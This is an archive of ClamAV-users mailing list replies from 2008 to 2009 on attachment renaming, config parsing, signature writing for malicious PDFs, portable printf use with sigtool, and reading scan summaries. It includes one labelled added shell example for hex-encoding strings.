>> one that will never be used for an application (present or future). Does 
>> anyone know if a standard suffix has been created for just this purpose?
>> 
>
> Such a suffix does not and cannot exist. There is no regulation or
> assignment authority for file suffixes. Every Windows program can claim
> and use any suffix it likes.
> What's more, even if a suffix is not assigned to any program by default,
> when the user tries to open a file with that suffix on a particular
> Windows installation the system will cheerfully offer him or her to choose
> a program for opening it, which it will by default permanently associate
> with that suffix, and then it isn't unassigned anymore.
> So no suffix you try to put aside will ever be safe from being assigned
> to an application, either by the application's author or by individual
> users.
>
> HTH
> T.
>
>   
You could rename to .executable-renamed-$RANDOM
The name is descriptive enough so no one will want to use it for something 
other than executables. Yet it isn't constant, so users won't be able to 
place an association to the program. And by beginning the extension with 
.exe, you're making life easier for your users when they want to rename 
attachments back: they just need to remove the end of the extension.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] Handling of unknown configuration lines (was Re: Stop it!)

2008-10-04 Thread Sarocet
Aecio F. Neto wrote:
> I don't agree with that, but let me put another option:
> 1) Break on unknown options
> 2) Ignore obsolete options and warn OP
>
> If any Op (or poor user) adds an option like
> PleaseClamAVCleanInfectedFilesForMe yes
> and expects it to work, are you really sure that the software should not
> ignore this?
>
> I see no difference from my example to yours, because one should
> understand at minimum which options are available before adding one he
> *thinks* exists.
That doesn't address typos. You can know by heart the configuration 
options, even be the program developer, but mistype the config file.
So the program should at least loudly complain when you try to run it 
with such option.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml


Re: [Clamav-users] ClamAV Webinar on 4th March

2009-02-21 Thread Sarocet
Nigel Horne wrote:
> s...@softhome.net wrote:
>>> For further details, including how to listen to the broadcast and
>>> Alain's biography, please visit
>>> http://www.clamav.net/2009/02/09/clamav-users?-webcast/ 
>>>   
>
>   
>> Please check the above link. There seems to be a problem with it. Thanks 
>> 
>
> Thanks for point this out.
>
> The problem lies with the mailing list software which munged the URL. To 
> find out the details please visit www.clamav.net, scroll down to the 
> news section then click on the title of the ClamAV Users' Webcast entry 
> - that will take you to the page where you can find out more about the 
> Webcast.
>
> -Nigel

Easier instructions: Remove the ? from the above url.

Which unless I'm also munged would be:
http://www.clamav.net/2009/02/09/clamav-users-webcast/



Re: [Clamav-users] Signatures for documents exploiting CVE-2009-0658?

2009-03-14 Thread Sarocet
Adam Stephens wrote:
> The other day we got mailed a wave of PDF files aimed at exploiting 
> CVE-2009-0658.
>
> Does anyone have working generic signatures for documents with this 
> exploit in? I've made an MD5 signature* for the particular document we 
> got, & submitted it, but I know there are plenty of other similar 
> documents out there... and I can't see how to make a generic signature 
> myself without unpacking the PDFs with pdftk first.
>
> Cheers,
> Adam.
>
> * That's c8cab28e550f60468099f60a0b6ccb81
>   
I think that core clamav should be changed for better pdf support in order to catch all the different ways it can be disguised.



Re: [Clamav-users] ClamAV and VirusTotal

2009-03-19 Thread Sarocet
Julio Canto wrote:
> Paul Whelan wrote:
>   
>> must be the clamwin version then  which is a 
>> strange 'official 
>> channel'.
>> 
>
> Hi again,
> You're wrong assuming that, therefore you should not accuse us of using
> 'strange official channels'. All engines and parameters used - including
> the ones from ClamAV - at VirusTotal are decided and provided with the
> vendors involved
The wording doesn't seem to "In the case of ClamAV, ClamWin Free Antivirus was chosen" ("En el caso de ClamAV se ha optado por ClamWin Free Antivirus"). It looks like an internal decision to use ClamWin, not that the ClamAV developers recommended it.

http://www.hispasec.com/unaaldia/2080



Re: [Clamav-users] Update to the signatures.pdf

2009-03-26 Thread Sarocet
Nathan Brink wrote:
> There is an option for echo that removes the linefeed:
> ohnobi...@ohnopublishing ~/html/anindex $ echo -n "How do I look in 
> hex?" |sigtool --hex-dump
> 486f7720646f2049206c6f6f6b20696e206865783f
>
> There is no reason to, but I prefer echo to printf. Maybe because printf 
> processes escapes such as ``%s'' and ``%%'':
> ohnobi...@ohnopublishing ~/html/anindex $ printf %%\\n
> %
>
> Maybe you should include a warning note about how printf will eat 
> certain characters ;-).
>   
echo -n is not standard. printf is.
If you don't want it to eat characters use

$ printf %s "Foo%%Bar"
Foo%%Bar

Beware of spaces splitting the text to the second argument, though.
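As an added example (not code from the thread), the function below hex-encodes a string the way the thread feeds text to sigtool --hex-dump, using a fixed printf format so '%' survives and quoting so spaces are not split into extra arguments; od(1) stands in for sigtool so it runs without ClamAV installed.

```shell
#!/bin/sh
# Added example, not from the thread: produce the hex form of a string as
# sigtool --hex-dump would, with POSIX od(1) standing in for sigtool.

# Portable: the format string is the fixed literal %s, so '%' in the data is
# never treated as a conversion, and "$1" is quoted so spaces never split the
# text into further arguments. printf emits no trailing newline, unlike echo.
to_hex() {
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n'
}

# The pitfall from the thread: passing the data as printf's *format* makes
# printf interpret %% (and eat %s, %d, ...). Shown only for comparison.
to_hex_broken() {
    printf "$1" | od -An -tx1 | tr -d ' \n'
}

# Sample strings taken from the thread
to_hex 'How do I look in hex?'   # 486f7720646f2049206c6f6f6b20696e206865783f
echo
to_hex 'Foo%%Bar'                # 466f6f2525426172 (both % preserved)
echo
to_hex_broken 'Foo%%Bar'         # 466f6f25426172 (one % lost)
echo
```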




Re: [Clamav-users] Anomaly when scanning a tar.gz file

2009-04-05 Thread Sarocet
Paul Kosinski wrote:
> 09:51:08 u...@host:~/src/openssl> clamscan -ri openssl-0.9.8k/
>
> --- SCAN SUMMARY ---
> Known viruses: 537879
> Engine version: 0.95
> Scanned directories: 134
> Scanned files: 2003
> Infected files: 0
> Data scanned: 13.86 MB
> Data read: 12.99 MB (ratio 1.07:1)
> Time: 10.665 sec (0 m 10 s)
>
>
>
> 09:51:24 u...@host:~/src/openssl> clamscan  openssl-0.9.8k.tar.gz
> openssl-0.9.8k.tar.gz: OK
>
> --- SCAN SUMMARY ---
> Known viruses: 537879
> Engine version: 0.95
> Scanned directories: 0
> Scanned files: 1
> Infected files: 0
> Data scanned: 35.54 MB
> Data read: 3.67 MB (ratio 9.68:1)
> Time: 14.661 sec (0 m 14 s)
3.67 MB + 18 MB + 13.86 MB = 35.53 MB, plus rounding errors, gives the reported 35.54 MB.
(tar.gz size + tar size + uncompressed scanned size)
